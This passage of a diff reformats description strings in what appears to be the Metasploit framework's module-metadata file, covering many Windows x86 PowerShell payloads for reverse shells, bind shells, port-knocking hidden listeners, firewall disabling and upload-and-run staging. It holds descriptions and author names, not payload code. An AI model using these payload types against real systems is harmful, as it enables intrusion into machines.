      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -180777,7 +181342,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -180816,7 +181381,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -180856,7 +181421,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -180896,7 +181461,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -180934,7 +181499,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -180973,7 +181538,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -181012,7 +181577,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -181050,7 +181615,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -181089,7 +181654,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -181126,7 +181691,7 @@
      "jt <jt@klake.org>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -181163,7 +181728,7 @@
      "jt <jt@klake.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -181201,7 +181766,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -181241,7 +181806,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [

    ],
@@ -181279,7 +181844,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -181315,7 +181880,7 @@
      "skape <mmiller@hick.org>",
      "jt <jt@klake.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [

    ],
@@ -181353,7 +181918,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -181390,7 +181955,7 @@
      "jt <jt@klake.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -181427,7 +181992,7 @@
      "jt <jt@klake.org>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181465,7 +182030,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181503,7 +182068,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -181542,7 +182107,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181582,7 +182147,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181622,7 +182187,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181660,7 +182225,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -181699,7 +182264,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -181738,7 +182303,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -181776,7 +182341,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -181815,7 +182380,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -181851,7 +182416,7 @@
      "ege <egebalci@pm.me>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -181887,7 +182452,7 @@
      "ege <egebalci@pm.me>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -181925,7 +182490,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -181965,7 +182530,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [

    ],
@@ -182002,7 +182567,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -182038,7 +182603,7 @@
      "ege <egebalci@pm.me>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [

    ],
@@ -182076,7 +182641,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -182112,7 +182677,7 @@
      "ege <egebalci@pm.me>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -182148,7 +182713,7 @@
      "ege <egebalci@pm.me>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -182184,7 +182749,7 @@
      "ege <egebalci@pm.me>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182222,7 +182787,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182260,7 +182825,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -182299,7 +182864,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182339,7 +182904,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182379,7 +182944,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182416,7 +182981,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -182451,7 +183016,7 @@
      "Spencer McIntyre",
      "bwatters-r7"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Open a socket and report UUID when a connection is received (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nOpen a socket and report UUID when a connection is received (Windows x86)",
    "references": [

    ],
@@ -182486,7 +183051,7 @@
      "Spencer McIntyre",
      "bwatters-r7"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to attacker and report UUID (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x86)",
    "references": [

    ],
@@ -182639,7 +183204,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -182678,7 +183243,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -182716,7 +183281,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -182755,7 +183320,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -182792,7 +183357,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -182829,7 +183394,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -182867,7 +183432,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -182907,7 +183472,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -182945,7 +183510,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -182982,7 +183547,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -183020,7 +183585,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -183057,7 +183622,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -183093,7 +183658,7 @@
      "spoonm <spoonm@no$email.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -183131,7 +183696,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -183169,7 +183734,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -183208,7 +183773,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -183248,7 +183813,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -183288,7 +183853,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -183326,7 +183891,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -183363,7 +183928,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -183399,7 +183964,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection and spawn a command shell",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell",
    "references": [

    ],
@@ -183434,7 +183999,7 @@
      "Spencer McIntyre",
      "Lin0xx <lin0xx@metasploit.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Disable the Windows ICF, then listen for a connection and spawn a command shell",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nDisable the Windows ICF, then listen for a connection and spawn a command shell",
    "references": [

    ],
@@ -183471,7 +184036,7 @@
      "sd",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from certain IP and spawn a command shell.\n                          The shellcode will reply with a RST packet if the connections is not\n                          coming from the IP defined in AHOST. This way the port will appear\n                          as \"closed\" helping us to hide the shellcode.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from certain IP and spawn a command shell.\nThe shellcode will reply with a RST packet if the connections is not\ncoming from the IP defined in AHOST. This way the port will appear\nas \"closed\" helping us to hide the shellcode.",
    "references": [

    ],
@@ -183507,7 +184072,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to attacker and spawn a command shell",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to attacker and spawn a command shell",
    "references": [

    ],
@@ -183581,7 +184146,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -183620,7 +184185,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -183658,7 +184223,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -183697,7 +184262,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -183734,7 +184299,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -183770,7 +184335,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -183808,7 +184373,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -183848,7 +184413,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -183886,7 +184451,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -183923,7 +184488,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -183961,7 +184526,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -183997,7 +184562,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -184034,7 +184599,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -184072,7 +184637,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker",
